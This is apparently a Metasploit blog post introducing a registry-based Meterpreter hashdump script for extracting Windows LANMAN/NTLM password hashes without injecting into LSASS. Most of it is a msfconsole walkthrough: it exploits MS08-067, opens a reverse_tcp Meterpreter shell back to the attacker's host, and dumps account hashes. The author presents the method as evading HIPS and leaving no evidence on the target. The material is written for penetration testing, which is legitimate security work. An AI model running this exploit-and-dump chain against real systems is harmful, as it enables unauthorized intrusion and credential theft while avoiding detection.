Safe, Reliable, Hash Dumping

Last updated at Wed, 27 Sep 2017 20:36:13 GMT

The Metasploit Meterpreter has supported the "hashdump" command (through the Priv extension) since before version 3.0. The "hashdump" command is an in-memory version of the pwdump tool, but instead of loading a DLL into LSASS.exe, it allocates memory inside the process, injects raw assembly code, executes its via CreateRemoteThread, and then reads the captured hashes back out of memory. This avoids writing files to the drive and by the same token avoids being flagged by antivirus (AV) and intrusion prevention (HIPS) products.

Over the last few years, many AV and HIPS products have added hooks to detect this behavior and block it at the API level. Unfortunately, the hooks are often implemented in a way that causes LSASS.exe to crash, which forces the entire system to either halt or reboot. This has made the "hashdump" command (along with pwdump and its friends) somewhat risky to use during a penetration test. One alternative to LSASS injection is to export the raw registry hives and then perform an offline extraction. This works, but it requires the hive files to be stored on the disk and currently requires external tools to use this method with the Metasploit Framework.

Over the last couple days, I reimplemented the registry-based method as a Meterpreter script. The key difference is that instead of using the reg.exe command to export the raw hives, this script uses direct registry access to extract the SYSKEY and decrypt the raw LANMAN and NTLM hashes. It isn't the fastest way to do it, but it leaves no evidence on the target, avoids the majority of the HIPS products (unless they filter registry reads), and most importantly is 100% safe in terms of system stability. The output below demonstrates a machine being compromised through MS08-067 and then having the LANMAN/NTLM hashes extracted using the live registry.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
 
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.151
 
msf exploit(ms08_067_netapi) > set LPORT 4444
 
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
 
msf exploit(ms08_067_netapi) > exploit
 
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.120:1041)
 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
 
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::

The caveat – to run this Meterpreter script, you must already have access to a SYSTEM token. This is already the case if you are exploiting a system service, like the Server Service or most DCERPC vulnerabilities, but can require a few additional steps if you only have administrative access. The reason is that the Administrators group does not have read access to the registry tree that contains the encrypted password hashes. The next blog post will go into the nitty-gritty details of impersonation and privilege escalation on the Windows platform.

-HD